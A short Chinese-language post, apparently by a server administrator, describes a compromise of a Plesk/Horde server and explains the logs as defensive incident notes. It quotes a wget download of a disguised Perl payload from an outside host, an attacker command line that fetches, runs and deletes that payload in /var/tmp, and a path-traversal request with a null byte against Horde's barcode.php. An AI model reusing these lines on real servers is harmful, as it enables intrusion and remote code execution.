在 error_log 可以看到
--10:51:45-- http://fallencrafts. info/download/himad.png => `himad.png' Resolving fallencrafts. info... 109.163.229.26 Connecting to fallencrafts. info|109.163.229.26|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 27,437 (27K) [image/png] 0K .......... .......... ...... 100% 42.65 KB/s 10:51:50 (42.65 KB/s) - `himad.png' saved [27437/27437]
himad.png 其實是 perl 程式
它會假裝 apache user 執行 httpd,
如果我們 ps axu | grep httpd,有時看到是 httpd -DSSL ,有時是 httpd -k graceful,甚至 klogd 都可能是 apache user,還會看到 sh <defunct>, 然後對外作溝通,至於幹什麼事我是不知道啦
假如抓得到行程的話 (每幾秒 ps axu | grep apache),可以有機會看到它第一時間是
wget xxx.png ; cd /var/tmp ; perl xxx.png ; rm xxx.png
之後看到一些 apache user 的 httpd (非正常的)
另外在 access_log 看到
/horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00
plesk KB 是有提供解決辦法,就是 patch
留言